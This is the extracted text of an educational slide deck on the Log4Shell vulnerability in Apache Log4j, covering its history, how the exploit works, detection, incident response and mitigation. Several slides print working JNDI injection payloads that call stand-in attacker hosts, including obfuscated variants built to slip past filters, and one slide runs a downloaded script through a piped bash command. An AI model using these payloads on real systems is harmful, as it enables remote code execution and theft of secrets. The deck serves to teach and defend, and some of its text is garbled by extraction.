Apache Log4j is a widely used Java-based logging library. It allows developers to log events and errors. However, the library contains a vulnerability that allows a malicious actor to execute arbitrary code by manipulating log messages. This Log4j vulnerability, known as Log4Shell, affects many major software and is considered one of the most severe vulnerabilities in recent years due to the widespread use of Log4j.
2.
Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü [1].
It is part of the Apache Logging Services, a project of the Apache Software Foundation [1].
It’s maintained by the Apache Software Foundation, an open-source cooperative maintaining several technologies, including Hadoop [6].
3. 3
Despite the importance of the Apache Logging Services in the tech world, the team that takes care of it is in fact a group of 16 voluntary,
unpaid developers distributed around the world [1].
[1] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
4. 4
[1] https://cybersecurityworks.com/blog/cyber-risk/have-you-patched-apache-log4j-vulnerability-cve-2021-44228.html
[2] https://medium.com/dark-roast-security/log4j-vulnerability-explained-22b71c702d35
[3] https://blog.devgenius.io/log4shell-as-explained-by-metaphor-and-memes-38de224a2eb7
[4] https://log4jmemes.com
[5] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
[6] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
As we are nearing the end of the year and many people are preparing themselves for the holidays, this period means for admins, security experts, as well
as attackers, anything but quiet days. They are all around the world working overtime and even sleepless because of the same reason, but for different
goals [6].
Log4j was discovered on December 9, 2021, leaving many cybersecurity professionals working 40-plus hour weeks through the end of the year to
assess their environments and coordinate remediation efforts across their organizations. It’s also one that left many other people asking, “What’s the big
deal? New zero-days are published every week, so why is this one so bad?” [2][5][6].
Due to the obvious severity and publicity around this particular zero-day, vendors were quick to publish security fixes and the patching began. Unfortunately
for many IT and security teams, however, this massive project occurred right around the holidays in the last few weeks of December [2].
5. 5
• AWS,
• IBM WebSphere,
• Oracle,
• Cloudflare,
• Cisco,
• Logtas,
• Apple iCloud,
• Tesla,
• Apache Kafka,
• M necraft: Java Ed t on,
• Steam,
• VMWare,
• ElasticSearch,
• Red Hat,
• Twitter
The library’s ubiquity, the sheer ease of exploiting the vulnerability (basically, replacing one code line), and the fact that many
organizations don’t even know whether this code was even employed in their systems [3].
[1] https://www.korayagaya.com.tr/loglama/log4j-rce-log4shell-acikligi-devsecops
[2] https://www.beyaz.net/tr/guvenlik/haberler/dikkat_populer_apache_log4j_java_kutuphanesinde_sifirinci_gun_guvenlik_acigi.html
[3] https://www.israeldefense.co.il/en/node/53053
[4] https://blog.7sec.pw/cve-2021-44228-log4j
[5] https://medium.com/dark-roast-security/log4j-vulnerability-explained-22b71c702d35
[6] https://blog.devgenius.io/log4shell-as-explained-by-metaphor-and-memes-38de224a2eb7
Impact Of Log4j Vulnerability:
Log4j vulnerability could be used to perform several cyber attacks:
1. Deploy coin miners
2. Supply chain attacks
3. Deploying malware like remote access trojans and ransomware
4. Remote code execution and Arbitrary code execution
5. Denial of services
6. 6
• Although Log4J is used in Java, it can also be integrated into other programming languages like “C/C ++, C#, Python etc.”.
• This is actually the reason why the attack vector is so wide [1] [2].
• What makes CVE-2021-44228 especially dangerous is ease of exploitation: even an inexperienced hacker can successfully execute
an attack using this vulnerability. According to the researchers, attackers only need to force the application to write just one string to
the log, and after that they are able to upload their own code into the application due to the message lookup substitution function [4].
• Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and
that is why most Java developers use it [4].
[1] https://www.korayagaya.com.tr/loglama/log4j-rce-log4shell-acikligi-devsecops
[2] https://www.beyaz.net/tr/guvenlik/haberler/dikkat_populer_apache_log4j_java_kutuphanesinde_sifirinci_gun_guvenlik_acigi.html
[3] https://www.israeldefense.co.il/en/node/53053
[4] https://blog.7sec.pw/cve-2021-44228-log4j
7. 7
Penetration Test Process
[1] https://learningdaily.dev/log4shell-4-takeaways-for-developers-in-2022-fa40dcbec5de
• More interconnected components are continuously online than ever before, giving threat actors an increasingly large attack surface to target [1].
• To keep up with evolving threats, organizations will have an increasing need for IT security professionals such as security researchers and threat intelligence
analysts [1].
8. 8
According to telemetry data collected between December 11 and December 15, Germany and the U.S. alone accounted for 60% of
all the exploitation attempts. The most common attack targets during the observation period were the U.S., Canada, the U.K.,
Romania, Germany, Australia, France, the Netherlands, Brazil, and Italy [1].
[1] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
9. 9
• An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when
message lookup substitution is enabled [1][2].
• A single string of text can trigger an application to reach out to a malicious external host [1].
• The adversary grants the ability to retrieve a payload from a remote server and execute it locally [1].
• Firstly, Chen Zhaojun of Alibaba Cloud Security Team discovered the vulnerability, CVE-2021-44228 [1][4].
• On December 9, 2021, a zero-day vulnerability involving arbitrary code execution in Log4j 2 was discovered by Chen Zhaojun of
Alibaba Cloud Security Team and disclosed via the project´s GitHub repository and given the descriptor “Log4Shell” [2][5].
• Tenable characterized it as the single biggest, most critical and the worst vulnerability of the last decade [2][3][6].
• The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue [1][2].
[1] https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html
[2] https://fireup.pro/blog/log4shell-critical-vulnerability-discovered-in-apache-log4j
[3] https://medium.com/dark-roast-security/dark-side-126-intro-to-log4j-ed48a1d23851
[4] https://medium.com/purple-team/a-serious-log4j-flaw-puts-much-of-the-internet-at-risk-c1e342f4343e
[5] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
[6] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
10. 10
• An Alibaba engineer found the world-threatening software vulnerability related to Log4j, but instead of getting rewarded, the company
was disciplined by the Chinese regulator for not telling authorities soon enough [1].
• China’s Ministry of Industry and Information Technology decided to suspend a cybersecurity partnership with Alibaba Cloud for six
months [1].
• Alibaba Cloud did not immediately report vulnerabilities in the popular, open-source logging framework Apache Log4j2 to China’s
telecommunications regulator, citing a recent notice by the Ministry of Industry and Information Technology (MIIT, the nation’s
internet regulator) [2][4].
• MIIT said it received a report from a third party about the issue, rather than from Alibaba Cloud [2].
• The partnership would be reassessed in six months and revived depending on the company’s internal reforms [2].
• Alibaba Cloud declined to comment on the suspension [2].
[1] https://www.protocol.com/bulletins/alibaba-cloud-log4j
[2] https://www.asiafinancial.com/chinese-ministry-axes-alibaba-cloud-deal-over-late-bug-report
[3] https://www.wsj.com/articles/china-halts-alibaba-cybersecurity-cooperation-for-slow-reporting-of-threat-state-media-says-11640184511
[4] https://www.israeldefense.co.il/en/node/53107
11. 11
• Burp may not be affected but PortSwigger is putting out an update. Tenable kindly reports a vulnerability; but Burp uses a custom
logging library. Zed Attack Proxy (ZAP) does have an update coming out. Also, by the way, if you are a penetration tester Burp already
has a new extension to test for the log4j vulnerability.
[1] https://medium.com/cloud-security/log4j-the-aftermath-cf5d95e006ef
[2] https://forum.portswigger.net/thread/apache-log4j-2-15-0-remote-code-execution-nix-155999-111b84e7
[3] https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/
12. 12
What s Logg ng
in Cyber(Security) Space?
• Think about Jean-Luc Picard’s “Captain’s Log” entries at the start of every episode of Star Trek: The Next Generation, except in a
computer there’s thousands of episodes every millisecond and we’re diligently recording everything down to the very last sip of Earl Grey.
Logs are great, generally much beloved, and not historically one of the big sources of systems compromise. They’re even a great way to
monitor your system against compromise! [1].
[1] https://blog.devgenius.io/log4shell-as-explained-by-metaphor-and-memes-38de224a2eb7
[2] https://memory-alpha.fandom.com/wiki/Captain%27s_log,_USS_Enterprise_(NCC-1701-D),_2364
[3] https://sinematikyesilcam.com/2014/07/dunyada-cekilen-ilk-star-trek-filmi/
14. 14
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
• Logs are a mechanism for developers to record events that occur in their applications. Effectively, they are a simple way for developers
to save messages into one file so they can review the messages, troubleshoot and debug problems. Generally, there are two types of
log messages in the above [1].
• There are many ways to implement a logging mechanism. You can just put all the messages into one file and then read it manually. It’s
a simple option, but it doesn’t really scale with complex systems. Developers usually adopt logging frameworks because it makes their
job easier. In every language, you can find different frameworks to manage your log [1].
• Logging frameworks often offer complex parsing of log records, which is where a log entry that includes user input might become a
problem. What if user input gets processed by the logging framework as a command? That could be bad [1].
15. 15
What s Logg ng?
Logging is the process of printing or recording the activities in an application [1].
Logging is more art than science [2].
1) Which information should you log?
2) Which information goes to which level of logging?
Never log sensitive information like Identity Number, Password, Social Security number, credit card numbers or account number as plain
text in log file [2].
[1] https://medium.com/javarevisited/logging-in-java-log4j-vs-logback-vs-slf4j-88c533088d2a
[2] https://javarevisited.blogspot.com/2011/05/top-10-tips-on-logging-in-java.html#axzz7yYiSOzJr
[3] https://javarevisited.blogspot.com/2016/06/why-use-log4j-logging-vs.html#axzz7yYiSOzJr
[4] https://koraypeker.com/2018/10/14/loggerlarin-dogusu/
16. 16
Java Logging: Logg ng Frameworks
Java logging or logging in java is as much an art as science [2].
System.out.println, System.err.println, Apache Commons logging, java.util.logging, logback, SL4j, org.apache.log4j.*
(Log4j, Log4j 2) [1] [3] [4].
Latency and speed are a major concern [2].
Fundamental questions on java logging like "Why we need logging in Java", "What are different logging levels in Java, and how to
choose the correct logging level in java”, "How incorrect java logging affect performance" [2].
Why a Java developer should use a Logging framework over System.out.println()? [3].
1. Information segregation using Log Level
2. Performance and Flexibility
3. Better Log Messages
[1] https://medium.com/javarevisited/logging-in-java-log4j-vs-logback-vs-slf4j-88c533088d2a
[2] https://javarevisited.blogspot.com/2011/05/top-10-tips-on-logging-in-java.html#axzz7yYiSOzJr
[3] https://javarevisited.blogspot.com/2016/06/why-use-log4j-logging-vs.html#axzz7yYiSOzJr
[4] https://javarevisited.blogspot.com/2013/08/why-use-sl4j-over-log4j-for-logging-in.html
17. 17
Apache Log4j is a Java-based logging library [4].
The Log4j library is widely used in the Java universe to log events or errors. The problem arises when we try to send a manipulated
request into the log [6].
Log4j is a logging framework written in Java and distributed under the Apache Software License [5].
It is used to capture, format, and publish the logging information produced by systems and applications to multiple destinations [5].
System.out.println() method to print something on the console, which can also be routed to log file but not sufficient for a real-world
Java application [3].
Log4j offers a lot more features, flexibility, and improvement on message quality [2][3].
[1] https://medium.com/javarevisited/logging-in-java-log4j-vs-logback-vs-slf4j-88c533088d2a
[2] https://javarevisited.blogspot.com/2011/05/top-10-tips-on-logging-in-java.html#axzz7yYiSOzJr
[3] https://javarevisited.blogspot.com/2016/06/why-use-log4j-logging-vs.html#axzz7yYiSOzJr
[4] https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html
[5] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
[6] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
[7] https://levelup.gitconnected.com/what-is-the-log4j-vulnerability-everything-you-need-to-know-f8197f2f6dac
18. 18
Java Logging: Log Levels
The logs can be classified based on their severity in the form of log levels [1].
There are various log levels as seen in the diagram [1].
There is an Integer value for each log level and the higher value indicates higher priorities [1].
Do not separate the loggers manually, instead set an appropriate log level to get all the information about the warnings in the system
or when your client asked about only error loggers [2].
[1] https://medium.com/javarevisited/logging-in-java-log4j-vs-logback-vs-slf4j-88c533088d2a
[2] https://medium.com/@knoldus/configuration-file-for-log4j-an-introduction-da714250583a
19. 19
• There are tons of information published on this matter [1].
• Three different components play different roles in the exploitation of the vulnerability and the ways an attacker could just use one
HTTP call to run remote code on a server that runs Log4j [2].
• Let’s see how does the Log4j vulnerability works pragmatically [1].
• To understand how does the Log4j vulnerability work, we should be familiar with the Log4j library, JNDI, and LDAP services [1].
• JNDI
• LDAP
• Log4j Library
[1] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
[2] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
20. 20
JNDI
• The Java Naming And Directory Interface (JNDI) is a standard interface for accessing names, host addresses, and other information about databases, directories, remote hosts, network
resources, and users. With it, you can easily access files and data from any machine connected to the Internet. This function can be used to connect to several applications such as JDBC
and ODBC, which allow you to use SQL and PL/SQL languages as well [3].
• JNDI (or Directory Lookups) is a system of directory lookups in Java. It allows us to read the configuration from the network instead of packaging it inside a Java application and then
installing the packages in production [2].
• Its main function is to provide naming and directory functionality to applications developed in the Java language. It is a Java API that allows applications to communicate with other
applications such as LDAP, DNS, NIS, NDS, RMI, and CORBA.
• JNDI architecture has two main components: JNDI API and JNDI SPI.
• API is used to access different naming and directory services. It allows the Java application to communicate with applications such as LDAP, DNS, NIS, NDS, RMI, and CORBA.
• JNDI has a JNDI SPI (Service Provider Interface) for each naming and directory service to communicate with different services.
[1] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
[2] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
[3] https://levelup.gitconnected.com/what-is-the-log4j-vulnerability-everything-you-need-to-know-f8197f2f6dac
21. 21
LDAP
• Lightweight Directory Access Protocol.
• The lightweight version of the directory protocol.
• It’s a part of x.500 network standards.
• Industry-standard application protocol used to access and maintain distributed directory services over the network.
• It stores users, passwords, profile information, computer objects, and more, and shares all the information with other infrastructure
and application entities over the network.
[1] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
22. 22
Log4j has three different components to capture, format, and publish the logging information produced by systems and applications
to multiple destinations [2].
Loggers are Java objects that trigger log events [1]. Loggers captures logging information [2].
When the application calls the logger to generate logs, log events are triggered and then passed to the Appender or Handler [1].
Appenders publishes logging information to multiple destinations [2]. Appenders export logs to the Destination. The destination
can be a file or console or specific Syslog servers [1]. Appenders have components called Filters to filter the log messages from
getting exported [1].
Layouts: Format logging information in different styles [2].
[1] https://medium.com/javarevisited/logging-in-java-log4j-vs-logback-vs-slf4j-88c533088d2a
[2] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
23. 23
Log4j 2.x: How Does The Log4j Vulnerability Work?
• Once attacker found a server with vulnerable version of Log4j library, the attacker will send a get request to the victim server with
attacker’s LDAP server’s link in it [1].
• The victim server will just connect to the attacker’s LDAP server without verifying it [1].
• Then the attacker will send a LDAP response to the victim server with malicious payload. Since Log4j2 library is vulnerable to receive
the payload and execute without verification. The attacker can make use of this vulnerability to compromise the victim server [1].
[1] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
24. 24
• The Log4j2 library receives variable data from the LDAP and JNDI lookup and execute it without verification. This results in an open
threat that could be used to send the malicious payload by crafting a malicious request [4].
• The Log4j vulnerability allows remote code execution by simply typing a specific string into a textbox , works on every program using
the Log4j library [3].
• An actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be
weaponized to execute malicious code and allow a complete takeover of vulnerable systems [2].
• The issue concerns a case of unauthenticated and remote code execution (RCE) on any application [2].
• This vulnerability creates an active connection to LDAP, loading a Java Class or Jar that would be a malicious file directly into
memory, causing the execution context to be ready. With Java already being interpreted as binary, it would already be executed and
with that, accessing the memory. And accessing the memory, grants us access to databases, files… anything we want to do [5].
• Your first targets are usually data entry points like username and password logins, http headers like User-Agent, X-Forwarded-For and
others. Basically anywhere the user can provide data [5].
[1] https://www.korayagaya.com.tr/loglama/log4j-rce-log4shell-acikligi-devsecops
[2] https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html
[3] https://dev.to/aws-builders/log4j-hub-everything-related-to-log4j-cve-2021-44228-2b4h
[4] https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
[5] https://medium.com/stolabs/log4j-cve-2021-44228-897782630621
There are numerous ways to smuggle the payload.
Some of the headers are
•User-Agent
•Client-IP
•Cookie
•Referrer
•Authorization
Thanks to Java, attackers can exploit the
vulnerability
via RMI (Remote Method Invocation)
alongside
LDAP, COS (Common Object Service) and
DNS
to lookup and load remote objects.
25. 25
Log4j 2.x: Log4j Lookups
• Log4j offers developers many features to make their lives easier and save time. One of these features is called Lookups [1].
• It allows developers to insert variables into their logs. Some parts of the log are constant while some are dynamic [1].
• For example, if a developer wants to write the current time into a log message, its dynamic value depends on when the code is
running. Developers use Lookups to put variables, such as current time, into their logs [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
26. 26
Log4j 2.x: Log4j Lookups
• Lookups by themselves are not a problem. The problem is when a user has the opportunity to inject a Lookup into the log [1].
• Here’s how an end-user could use Lookups to write a strange entry into the log. The user tries to log into the website using a weird
username ${java:os}, which is actually a Lookup on Log4j [1].
• This username to server name parse isn’t malicious, but it’s tricky. An attacker could access Java functions, which shouldn’t be
exposed by design [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
27. 27
Log4j 2.x: JNDI and Lookups
• The Lookups mechanism supports various functions and protocols. One of the most interesting (and dangerous) is Java naming and
directory interface (JNDI) [1].
• JNDI protocol allows the Log4j framework to load a Java object [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
28. 28
Log4j 2.x: Local Vs. LDAP
• JNDI supports different protocols to retrieve the Java file [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
29. 29
Log4j 2.x: Exploitation
• One of them is LDAP, which is where this scenario goes from bad to really, really bad [1].
• LDAP allows you to retrieve files from a remote location. The Log4j library will load the Java file from a remote LDAP server when
using LDAP with JNDI [1].
• The combination of user input, JNDI lookups and LDAP creates a love triangle. This love triangle has spawned a hideous child:
The Log4Shell payload [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
32. 32
Log4j 2.x: Exploitation
• Attackers usually use the payload we see in the picture below. The dollar sign and brackets “${xxxxx}” trigger a lookup. Inside this
lookup, the attacker calls the JNDI-with-LDAP combination to load a remote Java file from Evil.com [1].
• The evil.com server stores a file called “malicious_Java.” If the victim’s server is vulnerable, it would download and run the remote
Java object from Evil.com [1].
• This allows the attacker to execute any Java code on the victim server. Now the attacker has full access to your system and can do
whatever they want, from simply shutting down the system to having a remote shell, extracting all information on your server, and/or
starting to mine cryptocurrency [1].
[1] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
34. 34
LogShell's Fourth Vector: CVE-2021-4104
Unsurprisingly, here comes another RCE vulnerability that affects Log4j v1.2 instances using the JMSAppender,
which will not be fixed because the 1.x branch has reached end-of-life. CVE-2021-4104 has a severity of 8.1 (high) on the CVSS v3 scale
and is classified as CWE-502 vulnerable to deserialization of untrusted data.
[1] https://cybersecurityworks.com/blog/cyber-risk/have-you-patched-apache-log4j-vulnerability-cve-2021-44228.html
[2] https://medium.com/dark-roast-security/log4j-vulnerability-explained-22b71c702d35
[3] https://blog.devgenius.io/log4shell-as-explained-by-metaphor-and-memes-38de224a2eb7
[4] https://inonst.medium.com/log4shell-simple-techincal-explanation-of-the-exploit-a5a3dd1918ec
[5] https://learningdaily.dev/log4shell-4-takeaways-for-developers-in-2022-fa40dcbec5de
43. 43
• Detection can be as simple as trying to make an HTTP request to do a DNS lookup against the vulnerable server(s). One can use
CanaryToken or Burp Collaborator to verify the DNS query [2].
• Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters.
• An attacker can also prepare a malicious Java file and include it as a string in any data that will be logged [3]:
${jndi:ldap://attackers-server.com/malicious-java-file}
https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
When the vulnerable server logs this string, Log4j will retrieve and execute Java code from an attacker-controlled server. If the code is a
remote shell, the attacker will get a local shell with the privileges of the system user running the vulnerable application [3].
• You can use a service dnslog.cn to create your DNS subdomain for a test [4].
Example: qwe3er.dnslog.cn
• Use this subdomain to craft a payload and send it with the request. Check request to DNS service after some time for confirmation of
successful callback.
• You should receive a similar request to DNS service (with Host & Java Version):
jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn
[1] https://infosecwriteups.com/log4j-vulnerability-cheatsheet-66b7aeabc607
[2] https://bigb0ss.medium.com/appsec-log4shell-cve-2021-44228-606f91e56866
[3] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
[4] https://sapt.medium.com/research-on-log4jshell-cve-2021-44228-cyber-sapiens-internship-task-7-ae18072732ec
[5] https://medium.com/geekculture/how-log4shell-detection-scanners-work-831559979541
45. 45
Manuel Detection:
• https://sapt.medium.com/research-on-log4jshell-cve-2021-44228-cyber-sapiens-internship-task-7-ae18072732ec
• https://medium.com/geekculture/how-log4shell-detection-scanners-work-831559979541
• https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
If you are searching for a command to check the Log4j version, then you may end up with no results. There is no such command that will tell
you the version of Log4j installed on your system. Some applications ship the libraries directly as a jar file and some will contain them in
archives. You may need to prep inside the jar or archive to see the version of Log4j.
How Log4Shell Detection Scanners Work?
• Detect vulnerable Java Archive (JAR) files.
• JAR files are, they are simply ZIP-compressed files that contain a collection of Java-based class files.
• Class files contain the executable code for Java Virtual Machine’s (JVMs) that executes portable Java code.
• Scanning for vulnerable Log4j classes requires that we first unzip a JAR file first. Then we have to search for a file named
JndiLookup.class. This file contains the vulnerable code that allows for remote code execution.
• You can find the example JAR here: https://github.com/1lann/log4shelldetect/blob/master/velocity-1.1.9.jar
Navigate to Resources Slides: CVE-2021-44228
46. 46
• First, unzip the JAR file into a folder: unzip velocity-1.1.9.jar -d velocity
• And then use find to find a file named JndiLookup.class : find velocity -type f -name '*JndiLookup.class’
• Finally, we can check if the JNDI lookup is patched by grepping for the string “JDNI is not supported”:
grep -i 'JNDI is not supported' velocity/org/apache/logging/log4j/core/lookup/JndiLookup.class
• We get no results, and therefore that this application is vulnerable.
NOTE: There are other strings that are also used by scanners for detection-related purposes.
Navigate to Resources Slides: CVE-2021-44228
47. 47
• For web applications, depending on the level of logging you have, you may be able to detect signs of exploitation by searching for key
strings. There is a specific structure to the field that is injected ‘${jndi:ldap:’.
• It will only detect the proof-of-concept attacks and low-level attackers. Additional URI handlers and methods to obfuscate or bypass this
basic detection are already appearing in analysis by researchers.
• Additional logging may be found in the Java or application-specific log files. Failure to construct a valid URI syntax can lead to a
stacktrace at the application level, so it’s important not just to focus on access or security logging, but also look at the application logs
for related errors.
Search For Files On The File System
You can use grep, find, strings, or any number of commands to search for the code. Bear in mind that encrypted, encoded, zipped, jarred, and
otherwise obfuscated code may require deeper analysis.
find / -name log4j*
Navigate to Resources Slides: CVE-2021-44228
48. 48
How to Find Out if You’re Using Log4j?
• To find out if your application is using a vulnerable version of Log4j, you need to scan your JAR files and the nested layers of JAR archives.
• There are open-source tools that can scan a large number of packaged dependency formats, check their existence, and report if they contain
vulnerabilities such as Syft and Grype.
• Such a tool can give support, but it does not provide 100% detection in all situations.
Syft
Syft generates a SBOM (Software Bill Of Materials). It’s able to determine which version of Log4j a Java application contains.
Link: https://github.com/anchore/syft
Navigate to Resources Slides: CVE-2021-44228
49. 49
Grype
Grype is a vulnerability scanner. It’s able to scan multiple levels of nesting and tell the list of vulnerabilities in specific software and identify the
vulnerabilities that a dependency contains.
Link: https://github.com/anchore/grype
Navigate to Resources Slides: CVE-2021-44228
50. 50
Quick Scan
wget https://raw.githubusercontent.com/anuvindhs/how-to-check-patch-secure-logj4-CVE-2021-44228/main/assets/scan.sh -q -O -| bash
log4j-scan
python3 log4j-scan.py -u http://log4j.lab.secbot.local:8080
python3 log4j-scan.py -l urls.txt --headers-file headers-large.txt --waf-bypass --run-all-tests
With the above command you can test for maximum cases for log4 including headers and WAF Bypass techniques.
Review: https://infosecwriteups.com/log4shell-zero-day-exploit-full-guide-3a505f0c4248
Navigate to Resources Slides: CVE-2021-44228
51. 51
log4j-detect
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading:
python3 log4j-detect.py <urlFile> <collaboratorPayload>
Navigate to Resources Slides: CVE-2021-44228
67. 67
• If you do find signs of compromise, it is important to put your Incident Response plan into place quickly [1].
• If the affected device is mission critical, determine whether you can isolate it from the internet or do not turn it off to prevent any
further damage being done by the attackers [1].
• Collecting as much context and forensic evidence as possible is key to gaining situational awareness [1].
• Attackers are swift in migrating from the first affected device to additional hosts and services. As reported by Crowdstrike, the average
“BreakOut time” for any given attack is almost 2 hours, so acting quickly and responsibly is imperative [1].
[1] https://www.immersivelabs.com/blog/everything-you-need-to-know-about-log4shell-cve-2021-44228/
[2] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
68. 68
[1] https://labs.k7computing.com/index.php/log4j-logging-internet/
[2] https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
It’s an easy way to evade detection and exploit unpatched services, let’s look at different types of payload we are seeing in the wild.
• Clear text payload
• Varying base64 payload
• Changing protocol
• Obfuscating ‘JNDI’ with lower and upper command
Some of the obfuscated payloads looks like as follows :
• ${jndi:ldap://evil.com/base64payload}
• ${jndi:${lower:l}${lower:d}a${lower:p}://evil.com/base64payload}
• ${${lower:jn}di:ldap://evil.com/base64payload}
• ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://evil.com/base64payload}
• CVE-2021-45046 payload: ${${::-j}${::-n}d${::- }:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-
t}omca${::-t}} Decoded: ${jndi:ldap://159.223.5.30:443/o=tomcat}
Any many more combinations like these makes the obfuscated payloads a challenge to block.
${${env:ENVNAME:-j}nd ${env:ENVNAME:-:}${env:ENVNAME:-l}dap${env:ENVNAME:-:}//attacker.com/a}
69. 69
• It’s important to state that “vulnerable” is not equal to “exploitable”. It’s true not to downplay the significance of this vulnerability, but for a
modern version of Java (anything post 8u191), achieving remote code execution is very difficult unless the target application fulfils a specific
set of requirements that are not enabled or present by default [1].
• Simply having a vulnerable version of Log4j is not enough for attackers to gain remote code execution [1].
• While this is true for older versions of Java (anything before 8u191), later versions of Java disable `trustURLCodebase` by default. This
means RCE is more difficult, it can still be achieved by using features in the hosted applications that could lead to deserialisation gadgets
[1].
• These attacks are not showing signs of sophisticated targeting; instead, they are scanning the internet looking for low-hanging fruit by
injecting a vulnerable string in the User-Agent header field. This field is often logged, especially when combined with error reporting [1].
• There are two main exploit attempt paths being used in the wild. Firstly, we are seeing non-targeted RCE attempts blindly attempting to
install crypto miners. These are running from automated scripts and, due the constraints in the above, are unlikely to be successful
against most targeted hosts [1].
• A second set of exploits are attempting to exfiltrate secrets from environmental variables. We have seen attackers trying to gain access to
AWS secrets and tokens that may be present on host. Due to the nature of the vulnerability, even if remote code execution is not viable,
the DNS request exfiltration methodology works in significantly more setups.
[1] https://www.immersivelabs.com/blog/everything-you-need-to-know-about-log4shell-cve-2021-44228/
[2] https://sapt.medium.com/research-on-log4jshell-cve-2021-44228-cyber-sapiens-internship-task-7-ae18072732ec
70. 70
[1] https://blog.devgenius.io/log4shell-as-explained-by-metaphor-and-memes-38de224a2eb7
[2] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
• Even if the Java code you or your team have written does not use Log4j, this does not mean that your application does not contain vulnerable
instances of the library. These instances could hide somewhere in a package or a framework used in your project and you don’t even know it.
[2].
• Struts, Hadoop, Elasticsearch, Grails, and Kafka are just a few examples of popular Java frameworks and packages that are used by
hundreds of thousands of enterprise apps (if not millions of applications and services), and guess what… they are also using Log4j [2].
• If your code has the vulnerability embedded deeply several levels down (a JAR nested in a JAR nested in a JAR), it’s not enough to just check
your Java archive (JAR). You need to investigate all the nested ones as well [2].
• According to Google, over 35,000 Java packages, which represent over 8% of the Maven Central repository, are vulnerable and most of them
have log4j as an indirect dependency [2].
71. 71
• The infosec community has mostly focused on targeting web applications, which remains the highest immediate threat. However, it’s
important to remember that this vulnerability is not restricted to web applications; any application that logs any user-controlled data could be
open to exploitation. This includes desktop applications which, in this context, could lead to privilege escalation [1].
• Others see that Log4Shell will haunt the Internet for years before being able to clean the mess [2]. (https://www.crowdsec.net/log4j-tracker)
• Using a web application firewall (WAF) to filter, identify, and block requests containing dangerous character strings. But the problem with
this approach is that there are many ways to escape it. An attacker can disguise by using regular expressions or writing their request as
bellow in order to bypass all filters and succeed in triggering the attack. Another downside of this practice is that it might block harmless
users. [2].
• Cloudflare is currently trying to protect its customers in this way by blocking requests in which the app has blocked a suspicious string $
{jndi:ldap://127.0.0.1:1389/a} in the screenshot below:
[1] https://www.immersivelabs.com/blog/everything-you-need-to-know-about-log4shell-cve-2021-44228/
[2] https://betterprogramming.pub/whats-the-hype-with-log4j-2de7a64f221
73. 73
• Enumerate any external facing devices that have log4j installed.
• Systems are kept up-to-date with JDK releases and library patches. Patch Systems (https://logging.apache.org/log4j/2.x/security.html and
https://logging.apache.org/log4j/2.x/download.html).
• Block the IOCs on Firewalls, Proxies, and other Security Monitoring solutions and keep track of them if any connection is established/observed with them in the
•
•
•
[1] https://www.cisa.gov/news-events/news/statement-cisa-director-easterly-log4j-vulnerability
[2] https://thesecmaster.com/how-to-fix-cve-2021-44228-log4shell-a-critical-0-day-rce-in-log4j-logging-library/
[3] https://logging.apache.org/log4j/2.x/security.html
[4] https://logging.apache.org/log4j/2.x/download.html
[5] https://medium.com/adyen/inside-adyen-the-log4j-saga-745d93dc08a0
[6] https://tales-from-a-security-professional.com/log4j-one-year-later-which-
lessons-can-be-learned-612bfaefbaac
For more: Go to Resources: Avoidance
74. 74
• The first and most important step for you is to make sure if the log4j vulnerabilities even affect you, then take the right actions.
• If you’re a programmer, it’s also important that you scan your applications during every stage of development because if an initial
source code scan is clean, it doesn’t mean the final build or the deployed app will be.
• It’s expected that the log4j security flaw and its impact will influence the future of web development and the dependencies ecosystem.
